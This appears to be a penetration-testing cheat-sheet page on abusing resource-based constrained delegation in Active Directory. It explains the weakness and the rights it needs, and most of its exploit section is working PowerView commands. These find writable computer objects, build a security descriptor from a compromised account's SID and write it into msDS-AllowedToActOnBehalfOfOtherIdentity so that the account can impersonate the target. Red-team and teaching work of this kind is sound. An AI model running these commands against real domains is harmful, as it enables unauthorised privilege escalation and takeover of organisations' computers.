Resource-based Constrained Delegation

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit

Vulnerability

Constrained delegation can also be resource-based. Instead of putting the attribute msDS-AllowedToDelegateTo on the computer which is trusted for delegation, the attribute msDS-AllowedToActOnBehalfOfOtherIdentity is populated on the targeted computer. Contrary to constrained delegation, resource-based constrained delegation does not need SeEnableDelegationPrivilege (generally a Domain Admin privilege) to be configured. You still need to have WriteProperty, GenericAll, GenericWrite or WriteDacl on the target computer to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

Prerequisites

  • Having WriteProperty, GenericAll, GenericWrite or WriteDacl rights on the target computer.
  • Compromised a domain principal (user or computer) with an SPN associated.

If you are not local administrator on any computer yet, you could abuse MachineAccountQuota to join a fake computer to the domain.

Exploit

The first step of this attack is to modify msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the target computer.

# Get domain objects that have needed rights to modify msDS-AllowedToActOnBehalfOfOtherIdentity.
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" }

# Get the SID of the principal with an SPN associated you already compromised.
Get-DomainComputer -Identity "$hostname" -Properties ObjectSid
Get-DomainUser -Identity "$samAccountName" -Properties ObjectSid

# Create a security descriptior with this SID.
$RawSecurityDescriptor = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ObjectSid)"
$RawSecurityDescriptorBinary = New-Object byte[] ($RawSecurityDescriptor.BinaryLength)
$RawSecurityDescriptor.GetBinaryForm($RawSecurityDescriptorBinary, 0)

# Set the attribute on the target computer.
Get-DomainComputer -Identity "$hostname" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $RawSecurityDescriptorBinary} -Verbose

# Verify it worked.
Get-DomainComputer -Identity "$hostname" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

Now you can impersonate the target computer using the principal you already compromised. To do so, you can perform S4U2Self Abuse.

Don’t forget to clean your mess!

Get-DomainComputer -Identity "$hostname" | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity